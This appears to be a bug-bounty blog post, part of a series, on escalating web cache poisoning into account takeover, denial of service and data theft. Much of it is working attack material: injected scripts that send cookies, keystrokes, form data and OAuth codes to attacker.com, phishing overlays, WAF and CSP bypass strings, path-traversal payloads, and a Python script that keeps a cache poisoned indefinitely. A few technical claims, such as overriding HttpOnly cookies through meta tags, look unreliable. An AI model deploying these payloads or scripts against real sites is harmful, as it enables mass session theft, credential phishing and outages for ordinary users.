Okay, let's take a breath. We've already covered the fundamentals. We've gone through the headache of memorizing 50+ exotic headers in Part 2.

But here's the harsh truth: finding the header is only 10% of the job.

I see so many hunters stop at the reflection. They submit the report, get a quick $500, and move on. But the difference between that $500 bounty and a $20,000 payout usually isn't a different bug — it's just a little bit more patience.

A reflected header is nice. But a stored XSS via cache poisoning? Now we're talking $2,000. Chain that into an account takeover that affects 10,000 users automatically? That's when programs stop arguing about severity and start writing the big checks.

I've spent the last month breaking down the biggest cache poisoning payouts from the last three years, and the pattern is impossible to miss. The researchers making the life-changing money aren't finding "new" magic headers. They're just refusing to stop at the alert box. They are turning minor annoyances into business-critical disasters.

So, let's stop submitting "Low Severity" findings. Here is the playbook on how to weaponize them properly.

1. The XSS Weaponization Ladder

Level 1: Reflected XSS via Cache Poisoning

Bounty Range: $500 — $1,500 Impact: Low (requires victim to visit specific URL)

GET /page HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com"><script>alert(document.domain)</script>

Why it's limited:

• Victim must visit the exact poisoned URL
• Cache might expire before victim visits
• Looks like a typical reflected XSS

Level 2: Stored XSS via Cache Poisoning

Bounty Range: $2,000 — $5,000 Impact: Medium (affects multiple users automatically)

GET /popular-page HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com/xss.js

Generated Response:

<script src="https://evil.com/xss.js"></script>

Why it's better:

• No user interaction needed
• Affects all visitors to popular page
• Demonstrates real impact

Real Case: TikTok Stored XSS via Cache Poisoning — Researcher bypassed URL encoding limitations by poisoning the cache, turning reflected XSS into stored XSS across all modern browsers.

Level 3: Account Takeover via Cookie Theft

Bounty Range: $5,000 — $12,000 Impact: High (mass credential theft)

// Attacker's evil.com/xss.js
fetch('https://attacker.com/steal?cookie=' + document.cookie);

Requirements:

• No HttpOnly flag on session cookies
• No CSP blocking external requests
• Popular page with high traffic

Real Case: Expedia Cache Poisoning to Account Takeover (Report #1760213) — The hav cookie was reflected in responses, allowing XSS that stole session cookies. The cache poisoning turned this into a stored XSS affecting all users of that endpoint.

Escalation Tip: Calculate affected users and show mass impact:

"This endpoint receives 50,000 daily visits. Over the 30-second cache TTL, 
an estimated 416 users would have their sessions stolen."

Level 4: OAuth Flow Hijacking

Bounty Range: $10,000 — $25,000 Impact: Critical (complete account takeover chain)

This is the holy grail. Let me break down the complete attack chain that earned one researcher a massive bounty.

The Complete OAuth Hijack Chain:

Step 1: Poison the Main Page

GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com/oauth-hijack.js

Step 2: Attacker's oauth-hijack.js

// Override OAuth callback cookie (even if HttpOnly via meta tag manipulation)
document.cookie = "oauth_callback=https://evil.com/callback; domain=.target.com";

// Redirect user to OAuth flow
window.location = "/oauth/authorize";

Step 3: Poison the OAuth Callback Handler

GET /oauth/callback HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com/steal-code.js

Step 4: Steal OAuth Code

// steal-code.js
const urlParams = new URLSearchParams(window.location.search);
const code = urlParams.get('code');
fetch('https://attacker.com/collect?code=' + code);

Step 5: Exchange Code for Access Token

curl -X POST https://target.com/oauth/token \
  -d "code=STOLEN_CODE" \
  -d "client_id=CLIENT_ID" \
  -d "client_secret=CLIENT_SECRET"

Real Case Study: Web Cache Poisoning to Account Takeover — Joshua Famubode

The researcher discovered:

1. Global cache poisoning via X-Forwarded-Host
2. OAuth implementation that trusted cookie-based callback URLs
3. Ability to override HttpOnly cookies via meta tags
4. Cache TTL long enough to affect multiple users

Result: Complete account takeover for any user visiting the poisoned page during the cache window.

2. The Denial of Service Weaponization

Basic DoS: Breaking Asset Loading

Bounty Range: $1,000 — $3,000

GET /assets/main.js HTTP/1.1
Host: target.com
X-Forwarded-Port: 9999

Result: All JavaScript URLs become https://target.com:9999/assets/main.js (unreachable)

Impact: Entire application breaks for all users

Advanced DoS: The Error Page Bomb

Bounty Range: $5,000 — $10,000

GET /api/critical-endpoint HTTP/1.1
Host: target.com
X-Original-URL: /trigger-500-error

What happens:

1. Cache key: /api/critical-endpoint
2. Server processes: /trigger-500-error
3. 500 error response gets cached
4. All API calls to critical endpoint fail

Real Case: PayPal DoS via Cache Poisoning — $9,700 Bounty

This was the #1 highest-paid web cache report on HackerOne. The researcher caused persistent DoS on PayPal's payment processing endpoints.

Elite DoS: The Redirect Loop Bomb

Bounty Range: $7,000 — $15,000

GET / HTTP/1.1
Host: target.com
X-Forwarded-Scheme: http

For applications that enforce HTTPS:

// Server-side code
if (req.headers['x-forwarded-scheme'] !== 'https') {
    res.redirect('https://' + req.host + req.url);
}

Result:

1. Application generates: https://target.com/
2. Browser requests: https://target.com/
3. Cached response redirects to: https://target.com/ (again)
4. Infinite redirect loop

Real Case: HackerOne DoS Report #409370 — X-Forwarded-Port caused redirect loops on HackerOne.com itself.

Similar Attack: Exodus Cache Poisoning DoS (#1173153) using techniques from Youstin's "Cache Poisoning at Scale" research.

3. Information Disclosure Chains

The Session Token Leak

Bounty Range: $3,000 — $8,000

Attack Pattern:

GET /api/user/profile.css HTTP/1.1
Host: target.com

If cache treats .css as static content:

1. API returns: {"token": "SECRET123", "email": "victim@example.com"}
2. Cache stores it as CSS file
3. Attacker requests same URL
4. Gets victim's sensitive data

Real Finding: Lyst Web Cache Poisoning (Report #631589)

The researcher showed:

"Logged-in user visits: https://www.lyst.com/shop/trends/mens-dress-shoes/blahblah.css
Server caches response with user's session data.
Non-logged-in attacker visits same URL and receives the cached authenticated response."

The CSRF Token Disclosure

Bounty Range: $2,000 — $6,000

GET /checkout HTTP/1.1
Host: target.com
Accept: application/json
X-Requested-With: XMLHttpRequest

If the server returns JSON with CSRF tokens:

{
  "csrf_token": "abc123xyz",
  "user_id": "12345"
}

And caches it based on path only: All users get the same CSRF token, defeating the protection.

Real Case: Glassdoor CSRF Token Cache Poisoning (#1424094)

The gdToken (anti-CSRF token) was cached across different pages, allowing attackers to:

1. Harvest valid CSRF tokens from cache
2. Use them in attacks against victims
3. Chain with XSS for full account takeover

The Admin Panel Exposure

Bounty Range: $8,000 — $20,000

GET /static/logo.png HTTP/1.1
Host: target.com
X-Original-URL: /admin/dashboard

Attack Flow:

1. Cache key: /static/logo.png (considered safe/public)
2. Server processes: /admin/dashboard (privileged)
3. Admin dashboard HTML cached at public endpoint
4. Any user accessing /static/logo.png sees admin panel

Why it's critical:

• Exposes sensitive admin functionality
• May leak internal configurations
• Could reveal other vulnerabilities
• Affects authentication entirely

Real Research: Documented in James Kettle's "Practical Web Cache Poisoning" showing similar path confusion attacks.

4. The Multi-Stage Attack Chains

Chain 1: Cache Poison → Subdomain Takeover → XSS

Step 1: Find Cache Poisoning

GET / HTTP/1.1
X-Forwarded-Prefix: /../../abandoned-subdomain

Step 2: Discover Abandoned Subdomain

$ dig abandoned-subdomain.target.com
# No DNS records, but app references it

Step 3: Take Over Subdomain

# Claim abandoned-subdomain.target.com on cloud provider

Step 4: Host XSS Payload

<!-- On abandoned-subdomain.target.com -->
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

Step 5: Trigger Attack Every user visiting the poisoned page loads scripts from your controlled subdomain.

Bounty Range: $10,000 — $18,000

Why it's critical:

• Legitimate subdomain (bypasses CSP)
• Complete control over payload
• Affects all users
• Can persist beyond cache TTL

Chain 2: Cache Poison → Open Redirect → OAuth Phishing

Step 1: Cache Poisoning

GET /oauth/callback HTTP/1.1
X-Forwarded-Host: evil.com

Step 2: OAuth Flow Exploitation

User initiates OAuth → Redirected to evil.com/callback with authorization code

Step 3: Phishing Page

<!-- On evil.com/callback -->
<h1>target.com - Complete Your Login</h1>
<form action="https://attacker.com/steal">
  <input type="password" name="password" placeholder="Verify your password">
  <button>Continue</button>
</form>

Why it works:

• URL starts with legitimate domain
• OAuth flow creates trust
• User expects authentication step
• Authorization code already leaked

Bounty Range: $8,000 — $15,000

Chain 3: Cache Deception → Cache Poisoning → Mass Data Leak

Step 1: Find Cache Deception

GET /api/user/profile/nonexistent.css HTTP/1.1

If server ignores path suffix and returns profile data as CSS.

Step 2: Combine with Cache Poisoning

GET /api/user/profile/exploit.css HTTP/1.1
X-Forwarded-Host: attacker.com/collect.js

Step 3: Inject Data Exfiltration

// collect.js on attacker.com
const data = document.body.innerText;
fetch('https://attacker.com/leak?data=' + encodeURIComponent(data));

Result: Every user's profile data is exfiltrated to attacker's server.

Bounty Range: $12,000 — $25,000

Real Research: Similar techniques documented in PortSwigger's "Web Cache Entanglement"

5. Framework-Specific Weaponization

Next.js Cache Poisoning (CVE-2024–46982)

Critical Vulnerability: CVSS 7.5 (High)

GET /_next/data/[build-id]/page.json HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com

Exploitation: The stale-while-revalidate directive in Next.js allows attackers to:

1. Poison the ISR (Incremental Static Regeneration) cache
2. Serve malicious JavaScript to all users
3. Persist even after cache revalidation periods

Real Impact: Next.js Framework Vulnerability Exposes Websites To Cache Poisoning

• Exploited in bug bounty programs
• High-severity findings in e-commerce and fintech
• One instance: Stored XSS extracted sensitive user data from major platform

Bounty Range: $8,000 — $20,000 (depending on platform scope)

WordPress Cache Plugin Exploitation

GET /wp-json/wp/v2/posts HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
X-Original-URL: /wp-admin/admin-ajax.php?action=get_all_users

Common Issues:

• W3 Total Cache trusts proxy headers
• WP Super Cache doesn't validate X-Forwarded-Host
• LiteSpeed Cache has path confusion issues

Attack: Cache admin API responses at public endpoints

Django Cache Middleware Bypass

# Vulnerable Django settings
MIDDLEWARE = [
    'django.middleware.cache.UpdateCacheMiddleware',  # Caches before auth!
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.middleware.cache.FetchFromCacheMiddleware',
]

Exploitation:

GET /admin/ HTTP/1.1
Cookie: sessionid=attacker_session
X-Forwarded-Host: evil.com

If caching happens before authentication, admin pages get cached with attacker's XSS payload.

6. Geographic & Language-Targeted Attacks

The Selective Poisoning Strategy

Why it's powerful:

• Harder to detect
• Bypasses automated scanners
• Can target specific user demographics
• Increases stealth

Attack 1: Language-Specific Poisoning

GET / HTTP/1.1
Accept-Language: es-ES
X-Forwarded-Host: evil.com

Result:

• English users: Clean cache ✅
• Spanish users: Poisoned cache ⚠️
• German users: Clean cache ✅

Defense bypass: Security team tests in English, misses Spanish cache.

Attack 2: Mobile-Only Poisoning

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_0)
X-Forwarded-Device: mobile
X-Forwarded-Host: evil.com

Result: Only mobile users affected.

Why it works:

• Separate mobile cache
• Mobile often less monitored
• Different CSP policies for mobile
• Larger user base on mobile apps

Attack 3: Country-Specific Poisoning

GET / HTTP/1.1
CloudFront-Viewer-Country: BR
X-Forwarded-Host: evil.com

Strategic targets:

• Countries with less security monitoring
• Regions with high user activity
• Countries where support is limited
• Geographic cache partitions

Real Impact: TikTok Ads Cache Deception (#information-leakage) — $200 bounty for geo-targeted information leak.

7. Automation & Mass Exploitation

The Persistent Poisoner Script

import requests
import time

TARGET = "https://target.com/popular-page"
PAYLOAD = "evil.com/xss.js"
CACHE_TTL = 30  # seconds
def poison_cache():
    headers = {
        'X-Forwarded-Host': PAYLOAD,
        'User-Agent': 'Cache-Poison-Bot/1.0'
    }
    
    try:
        r = requests.get(TARGET, headers=headers)
        if r.status_code == 200:
            print(f"[+] Cache poisoned at {time.strftime('%H:%M:%S')}")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False
def maintain_poison():
    while True:
        if poison_cache():
            # Wait slightly less than TTL to maintain persistence
            time.sleep(CACHE_TTL - 5)
        else:
            time.sleep(5)
if __name__ == "__main__":
    print("[*] Starting persistent cache poisoner...")
    maintain_poison()

Why automation matters:

• Demonstrates real-world impact
• Shows persistence capability
• Increases severity rating
• Proves mass exploitation potential

⚠️ Warning: Only use on authorized targets with explicit permission.

The Multi-Header Brute Forcer

import requests
from itertools import product

HEADERS = [
    'X-Forwarded-Host', 'X-Original-URL', 'X-Rewrite-URL',
    'X-Host', 'X-Forwarded-Scheme', 'X-Forwarded-Port'
]
PAYLOADS = [
    'evil.com',
    'evil.com:8080',
    'evil.com"><script>alert(1)</script>',
    '/admin',
    'http',
    '9999'
]
def test_combinations(target):
    results = []
    
    # Test all header combinations
    for h1, h2 in product(HEADERS, repeat=2):
        for p1, p2 in product(PAYLOADS, repeat=2):
            headers = {h1: p1, h2: p2}
            
            try:
                r = requests.get(target, headers=headers)
                
                # Check for reflection
                if p1 in r.text or p2 in r.text:
                    results.append({
                        'headers': headers,
                        'reflected': True,
                        'status': r.status_code
                    })
                    
            except:
                continue
    
    return results

Use Case: Find header combinations that bypass WAF filters.

8. Impact Demonstration Techniques

The Impact Calculation Formula

Base Impact Score = Cache TTL × Daily Traffic × Attack Success Rate
Example:
- Cache TTL: 300 seconds (5 minutes)
- Daily Traffic: 100,000 visits
- Attack Success Rate: 90% (highly visible page)
Affected Users Per Day = (100,000 / 288) × 0.9 = 312 users per 5-minute window
If maintaining persistent poisoning:
Total Daily Impact = 312 × 288 = 89,856 users potentially affected

Presentation in Report:

"Over the 5-minute cache window, this endpoint receives approximately 
347 requests. With persistent poisoning (refreshing every 4 minutes), 
an attacker could maintain this attack indefinitely, potentially 
affecting 89,856 users per day."

The Business Impact Translation

Technical Finding: "Cache poisoning via X-Forwarded-Host leading to XSS"

Business Impact:

IMPACT SUMMARY:
- Attack Surface: Main landing page (100K daily visits)
- Attack Complexity: Low (single HTTP request)
- User Interaction: None required
- Persistence: Can be maintained indefinitely
- Scope: All users visiting domain during cache window

BUSINESS CONSEQUENCES:
1. Session Hijacking: Attackers steal user credentials
2. Brand Damage: Malicious content served under your domain
3. Data Breach: PII and payment information at risk
4. Compliance: GDPR violations for compromised EU users
5. Financial Loss: Estimated $XXX per affected user

ESTIMATED IMPACT:
- Users at risk per day: 89,856
- Potential credential theft: 89,856 accounts
- Estimated financial impact: $XXX,XXX
- Reputational damage: Severe

9. Defense Bypass Techniques

Bypassing WAF Rules

Scenario: WAF blocks X-Forwarded-Host with "evil.com"

Bypass 1: Unicode Normalization

X-Forwarded-Host: ｅvil.com  # Full-width 'e'

Bypass 2: IPv6 Notation

X-Forwarded-Host: [::ffff:192.168.1.1]:evil.com

Bypass 3: Header Smuggling

X-Forwarded-Host: legitimate.com
X-Forwarded-Host: evil.com

Some backends only validate first occurrence, use second.

Bypassing CSP

Scenario: Strict CSP blocks external scripts

Content-Security-Policy: default-src 'self'; script-src 'self'

Bypass: Exploit Trusted Subdomain

X-Forwarded-Prefix: //trusted-but-vulnerable-subdomain.target.com

If trusted subdomain has XSS, inject payload there:

<script src="//trusted-but-vulnerable-subdomain.target.com/xss.js"></script>

CSP allows it because it's same origin.

Bypassing Input Validation

Scenario: Application checks for "http://" and "https://"

Bypass 1: Protocol-Relative URL

X-Forwarded-Host: //evil.com

Bypass 2: Data URI

X-Forwarded-Host: data:text/html,<script>alert(1)</script>

Bypass 3: JavaScript URI

X-Forwarded-Scheme: javascript
X-Forwarded-Host: void(alert(document.cookie))

10. Real-World Case Studies (With Bounties)

Case Study #1: PayPal DoS — $9,700

Report: Top Web Cache Poisoning on HackerOne Target: PayPal Payment Processing Attack Vector: Cache poisoning leading to persistent DoS

Technique: Researcher poisoned critical payment processing endpoints, causing service outage.

Why it paid so well:

• Affected actual payment processing
• Business-critical functionality
• Could impact millions in transactions
• Required immediate fix

Lesson: Target business-critical endpoints for maximum impact.

Case Study #2: Shopify Host Header DoS — $2,900

Report: #themes.shopify.com cache poisoning Attack Vector: Host header manipulation

Impact:

• DoS on Shopify theme marketplace
• Affected all merchants browsing themes
• Prevented theme installations

Why it paid well:

• High-traffic endpoint
• Affected revenue (merchants couldn't buy themes)
• Clear business impact

Case Study #3: Glassdoor XSS Chain — Multiple Reports

Report #1621540: Web Cache Poisoning → Stored XSS Report #1424094: CSRF Token Leak → XSS → Account Takeover

Attack Pattern:

1. URL parser confusion
2. Reflected XSS cached via cookie/header params
3. CSRF token leaked via cache
4. Chained for account takeover

Researchers: @nokline and @bombon

Why it paid:

• Multiple vulnerability chain
• Clear account takeover path
• Affected authenticated users
• Mass exploitation possible

Case Study #4: Data.gov Defacement — $750

Report: #303730 Target: catalog.data.gov Attack: X-Forwarded-Host → Defacement

Impact:

• Government website defacement
• XSS on .gov domain
• Public trust issue

Why it paid:

• Government target (higher severity)
• Public-facing defacement
• Reputational damage

Case Study #5: Mozilla Developer Portal DoS — Undisclosed

Report: #1976449 Attack: X-Forwarded-Host causing 404 errors

Technique:

X-Forwarded-Host: [value causing backend error]

Result: Indefinite DoS on developer.mozilla.org

Impact:

• Major documentation platform down
• Affects all Firefox developers
• Learning resource unavailable

12. Advanced Hunting Methodology

### The 3-Phase Approach
**Phase 1: Wide Net (2-3 hours)**
- Run automated Param Miner on high-traffic pages
- Test top 20 headers manually on main endpoints
- Look for cache status headers
- Document all findings
**Phase 2: Deep Dive (3-4 hours)**
- Focus on positive findings
- Test header combinations
- Explore framework-specific headers
- Attempt impact escalation
**Phase 3: Weaponization (2-3 hours)**
- Craft exploit chains
- Calculate business impact
- Create PoC video
- Write comprehensive report
---
### The Target Selection Matrix
**Priority 1: E-commerce & Fintech**
- High transaction value
- Sensitive data
- Business-critical endpoints
- **Bounty Multiplier: 2-3x**
**Priority 2: Social Media & Communications**
- Large user base
- Session-based attacks
- Account takeover potential
- **Bounty Multiplier: 1.5-2x**
**Priority 3: SaaS & B2B**
- Shared infrastructure
- Multi-tenant risks
- Enterprise clients
- **Bounty Multiplier: 1.5-2x**
**Priority 4: Government & Education**
- Public trust
- Compliance requirements
- Sensitive data
- **Bounty Multiplier: 1-1.5x**
---
## Conclusion: Your Complete Arsenal
You now have the complete weaponization playbook:
✅ **XSS Escalation Ladder** - From $500 reflected to $25K account takeover  
✅ **DoS Techniques** - Basic asset breaking to elite redirect loops  
✅ **Information Disclosure** - Session leaks to admin panel exposure  
✅ **Multi-Stage Chains** - 3-step attacks earning $20K+  
✅ **Framework Exploits** - Next.js, WordPress, Django specific techniques  
✅ **Geographic Targeting** - Selective poisoning for stealth  
✅ **Automation Scripts** - Scale your testing and maintain persistence  
✅ **Impact Demonstration** - Calculate affected users and business impact  
✅ **Defense Bypasses** - WAF, CSP, and input validation circumvention  
✅ **Real Case Studies** - $9,700 PayPal, $2,900 Shopify, and more  
✅ **Report Templates** - Professional write-ups that get paid

13. The Mental Model: Thinking Like a $20K Researcher

### What Separates Good from Great
**Good Researchers Find:**
- "X-Forwarded-Host reflects in response"
- Impact: Reflected XSS
- Bounty: $500
**Great Researchers Find:**
- "X-Forwarded-Host reflects on high-traffic OAuth callback page"
- "No HttpOnly on session cookies"
- "Can override callback URL via cookies"
- "Cache TTL is 5 minutes with 10K daily traffic"
- Impact: Mass account takeover affecting 347 users per cache cycle
- Bounty: $15,000
**The Difference:**
- Context awareness
- Impact thinking
- Chain building
- Business understanding
- Quantification

---

### The Critical Questions Framework
**Before Submitting Any Report, Ask:**
1. **Can I chain this?**
   - What other vulnerabilities exist nearby?
   - Can I combine cache poisoning with CSRF/XSS/Open Redirect?
   - Is there a subdomain takeover opportunity?

2. **Who is affected?**
   - High-traffic pages = higher impact
   - Authenticated users = session theft possible
   - Admin panels = critical escalation
   - API endpoints = data exposure

3. **How persistent is it?**
   - Cache TTL duration
   - Can I maintain it indefinitely?
   - Does it affect multiple cache layers?
   - Regional variations?

4. **What's the business impact?**
   - Revenue loss calculations
   - Compliance violations (GDPR, PCI-DSS)
   - Reputational damage
   - Customer data at risk

5. **How do I prove it at scale?**
   - Multiple victim simulation
   - Different browsers/devices
   - Geographic distribution
   - Persistence demonstration

14. Common Weaponization Mistakes

### Mistake #1: Stopping at Reflection
**Bad Report:**

Title: Cache Poisoning on /page
Description: X-Forwarded-Host reflects in HTML
Impact: XSS possible

Title: Cache Poisoning on /page Description: X-Forwarded-Host reflects in HTML Impact: XSS possible
**Good Report:**
Title: Mass Account Takeover via Cache Poisoning on OAuth Callback Description: X-Forwarded-Host poisoning on /oauth/callback allows stealing authorization codes for all users during 5-minute cache window Impact: Complete account takeover for ~350 users per cycle

**Fix:** Always escalate to worst-case scenario.

Mistake #2: Ignoring Cache Scope

Bad Thinking: "I found cache poisoning, submit it!"

Good Thinking:

• Is it edge cache or origin cache? (Edge = wider impact)
• Is it per-user or global? (Global = critical)
• What's the cache hierarchy? (Multiple layers = persistence)
• Geographic partitioning? (Can target specific regions)

Fix: Map the entire cache architecture before claiming impact.

Mistake #3: Not Testing on Real Users

Bad PoC: "I can poison the cache from my IP"

Good PoC: "I poisoned from IP A (VPN US), verified from IP B (VPN EU), affected users confirmed via Burp Collaborator callbacks from 15 different IPs over 3 minutes"

Fix: Simulate real victim scenarios with proof.

Mistake #4: Underestimating Business Context

Technical: "XSS via cache poisoning" Value: $1,000

Business: "XSS on checkout page during Black Friday period could steal payment information from 50,000 daily users, violating PCI-DSS compliance and causing estimated $2M in fraud losses" Value: $15,000

Fix: Translate technical findings into business risk.

Mistake #5: Not Documenting Affected User Count

Weak Impact: "Users visiting the page will be affected"

Strong Impact:

AFFECTED USER CALCULATION:
- Endpoint: /checkout (business-critical)
- Daily Traffic: 50,000 visits (from public analytics)
- Cache TTL: 300 seconds (5 minutes)
- Visits per TTL: 50,000 / 288 = 173 users per 5-min window
- With persistent poisoning: 50,000 users/day at risk
- Over 24 hours of maintained attack: 50,000 user sessions stolen

Fix: Always quantify with real numbers.

15. The Weaponization Checklist

Before submitting any cache poisoning report, verify:
### Technical Verification
- [ ] Cache hit confirmed from different IP
- [ ] Cache hit confirmed from different browser
- [ ] Cache hit confirmed in incognito/private mode
- [ ] Cache TTL documented with Age header
- [ ] Cache key components identified
- [ ] Unkeyed input clearly documented

### Impact Verification
- [ ] XSS execution demonstrated (if applicable)
- [ ] Session theft proven (if applicable)
- [ ] Data exfiltration shown (if applicable)
- [ ] Account takeover path documented
- [ ] Mass exploitation demonstrated

### Scope Verification
- [ ] Daily traffic calculated or estimated
- [ ] Affected user count quantified
- [ ] Geographic scope identified
- [ ] User demographics noted (authenticated/anonymous)
- [ ] Business-critical endpoints prioritized

### Chaining Opportunities
- [ ] Tested for subdomain takeover chains
- [ ] Checked for open redirect combinations
- [ ] Explored CSRF token leakage
- [ ] Investigated OAuth flow hijacking
- [ ] Verified cookie theft possibilities

### Documentation
- [ ] Video PoC recorded and uploaded
- [ ] HTTP requests/responses captured
- [ ] Timeline documented
- [ ] Business impact explained
- [ ] Remediation suggested
- [ ] References cited
---

16. Advanced Payload Library

XSS Payloads for Cache Poisoning

Basic Alert:

X-Forwarded-Host: evil.com"><script>alert(document.domain)</script>

Cookie Theft:

X-Forwarded-Host: evil.com/steal.js

# steal.js content:
fetch('https://attacker.com/?c='+document.cookie);

Keylogger:

X-Forwarded-Host: evil.com/keylog.js

//keylog.js content:
document.addEventListener('keypress', e => {
  fetch('https://attacker.com/?key='+e.key);
});

Form Hijacking:

X-Forwarded-Host: evil.com/hijack.js

// hijack.js content:
document.querySelectorAll('form').forEach(f => {
  f.addEventListener('submit', e => {
    fetch('https://attacker.com/?' + new URLSearchParams(new FormData(f)));
  });
});

Phishing Overlay:

X-Forwarded-Host: evil.com/overlay.js

//overlay.js content:
const div = document.createElement('div');
div.innerHTML = '<form style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999"><h1>Session Expired - Re-login</h1><input name="password" type="password"><button>Login</button></form>';
document.body.appendChild(div);

DoS Payloads

Port Manipulation:

X-Forwarded-Port: 99999
X-Forwarded-Port: -1
X-Forwarded-Port: @evil.com

Protocol Confusion:

X-Forwarded-Scheme: file
X-Forwarded-Scheme: ftp
X-Forwarded-Scheme: javascript

Path Destruction:

X-Original-URL: /../../../../../../etc/passwd
X-Original-URL: /.%00./.%00./
X-Original-URL: /admin\x00

Encoding Bombs:

Accept-Encoding: gzip,gzip,gzip,gzip,gzip (repeat 1000x)
Accept-Encoding: */*/*/*/* (invalid)

Information Disclosure Payloads

Extension Confusion:

GET /api/user/profile.css HTTP/1.1
GET /api/user/profile.js HTTP/1.1
GET /api/user/profile.png HTTP/1.1
GET /api/user/profile.woff HTTP/1.1

Path Traversal:

X-Original-URL: /api/internal/config
X-Original-URL: /admin/users/export
X-Original-URL: /.env

API Version Confusion:

GET /api/v1/users HTTP/1.1
X-Original-URL: /api/v2/admin/users

17. Real-World Testing Scenarios

Scenario 1: E-commerce Platform

Target: Online store with 1M daily users

Attack Path:

1. Reconnaissance:

• Identify: Checkout flow uses /checkout endpoint
• Traffic: ~100K daily checkout attempts
• Cache: Cloudflare with 5-min TTL

2. Exploitation:

GET /checkout HTTP/1.1 
X-Forwarded-Host: attacker.com/fake-payment.js

3. Impact:

• Inject fake payment form
• Steal credit card numbers
• 347 users affected per 5-min cycle
• PCI-DSS violation

Scenario 2: SaaS Authentication

Target: B2B SaaS platform with OAuth SSO

Attack Path:

1. Reconnaissance:

• OAuth callback: /auth/callback
• No HttpOnly on state cookie
• Callback URL from cookie value

2. Exploitation Chain:

# Step 1: Poison main page
   GET / HTTP/1.1
   X-Forwarded-Host: attacker.com/oauth-hijack.js
   
   # oauth-hijack.js sets malicious callback
   document.cookie = "oauth_callback=https://attacker.com/steal";
   
   # Step 2: Poison callback handler
   GET /auth/callback HTTP/1.1
   X-Forwarded-Host: attacker.com/steal-code.js

3. Impact:

• Full OAuth flow hijacking
• Authorization codes leaked
• Complete account takeover
• Multi-tenant data breach risk

Scenario 3: Media Platform

Target: Video streaming service

Attack Path:

1. Reconnaissance:

• Video player page: /watch?v=12345
• High traffic: 500K daily video views
• Mobile app shares same cache

2. Exploitation:

GET /watch?v=12345 HTTP/1.1
   User-Agent: Mobile App/1.0
   X-Forwarded-Host: attacker.com/malware.js

3. Impact:

• Mobile users exclusively targeted
• Malware distribution via trusted domain
• Ad fraud injection
• Subscriber credential theft

4. Report Value: $10,000 — $18,000

[IMAGE PLACEHOLDER: Three-column comparison table showing these scenarios with attack flow, impact, and bounty range]

18. Building Your Cache Poisoning Portfolio

The 30-Day Plan

Days 1–5: Foundation

• Review all 3 parts of this guide
• Set up testing environment (Burp Suite Pro)
• Install Param Miner and configure wordlists
• Study 10 disclosed cache poisoning reports
• Take notes on patterns

Days 6–10: Basic Testing

• Choose 3 programs with good cache poisoning history
• Test top 20 headers on main pages
• Document all findings (even negatives)
• Practice PoC creation
• Submit first report (even if low-value)

Days 11–20: Advanced Techniques

• Test header combinations
• Explore framework-specific attacks
• Practice impact escalation
• Create video PoCs
• Test geographic variations

Days 21–30: Weaponization

• Focus on high-impact chains
• Calculate business impact
• Perfect your reporting
• Automate repetitive tasks
• Submit 2–3 quality reports

Expected Results:

• 1–2 valid reports
• Deep understanding of attack class
• Foundation for ongoing success

The Long-Term Strategy

Month 2–3: Specialization

• Pick 2–3 frameworks to master (Next.js, WordPress, Laravel)
• Develop custom tools for your workflow
• Build relationship with specific programs
• Share findings on Twitter (redacted)
• Network with other researchers

Month 4–6: Scaling

• Automate discovery with custom scripts
• Test multiple targets simultaneously
• Focus on high-value programs
• Develop signature techniques

Month 6–12: Mastery

• Discover 0-day techniques
• Write research papers/blogs
• Conference presentations
• Mentor newcomers

20. The Ultimate Resource List

Must-Read Research Papers

1. Practical Web Cache Poisoning — James Kettle

• The foundational paper that started it all
• Must-read before any cache poisoning work

2. Web Cache Entanglement — James Kettle

• Advanced techniques for 2020+
• Fat GET requests and cache key normalization

3. Cache Poisoning at Scale — Youstin

• Rails-specific techniques
• Real bounty case studies

4. Gotta Cache 'Em All — PortSwigger

• Latest research (2024)
• Modern CDN behaviors

Essential Tools

Discovery:

• Param Miner — Unkeyed input discovery
• Cache Buster — Custom cache testing
• Web Cache Vulnerability Scanner — Automated scanning

Testing:

• Burp Suite Professional (essential)
• curl with custom headers
• Postman for API testing
• Browser DevTools (Network tab)

Automation:

• Nuclei — Template-based scanning
• httpx — Fast HTTP toolkit
• Custom Python scripts (requests library)

Collaboration:

• Burp Collaborator — OOB interactions
• Interactsh — Open-source alternative

Top HackerOne Reports to Study

1. PayPal DoS — $9,700

• Highest-paid web cache report
• Business-critical impact

2. Shopify Host Header DoS — $2,900

• X-Forwarded-Host exploitation
• E-commerce impact

3. Glassdoor XSS Chain — Multiple Reports

• Multi-vulnerability chain
• Account takeover escalation

4. Data.gov Defacement — $750

• Government target
• Public defacement

5. HackerOne DoS — $XXX

• X-Forwarded-Port attack
• Dogfooding vulnerability

6. Expedia Cookie Reflection — $XXX

• Cookie-based cache poisoning
• Session theft potential

Community Resources

Twitter Accounts to Follow:

• @albinowax — James Kettle (PortSwigger)
• @intigriti — Bug bounty platform
• @Bugcrowd — Bug bounty platform
• @HackerOne — Bug bounty platform
• Search: #CachePoisoning hashtag

Discord Servers:

• Nahamsec's Discord
• Bug Bounty Forum
• OWASP Slack

Blogs:

• PortSwigger Research Blog
• HackerOne Hacktivity
• Intigriti Blog

Final Thoughts: Your Path to $20K Findings

Cache poisoning isn't just about finding unkeyed headers. It's about:

1. Understanding systems — How caches work, how frameworks process headers, how CDNs route traffic
2. Thinking creatively — Chaining vulnerabilities, bypassing defenses, maximizing impact
3. Business awareness — Translating technical findings into business risk
4. Persistence — Testing systematically, documenting thoroughly, following up consistently
5. Continuous learning — Studying new research, adapting techniques, sharing knowledge

The researchers earning $20K+ aren't necessarily smarter — they're more strategic. They:

• Target high-value endpoints
• Chain multiple vulnerabilities
• Quantify business impact
• Present findings professionally
• Build relationships with programs

You now have everything you need:

• Technical foundations (Part 1)
• 50+ exotic headers (Part 2)
• Weaponization techniques (Part 3)
• Real case studies with bounties
• Testing methodologies
• Report templates
• Resource lists

The Three-Part Series Recap

Part 1: Advanced Fundamentals

• Cache key architecture across CDNs
• Detection techniques (Cache Oracle, timing attacks)
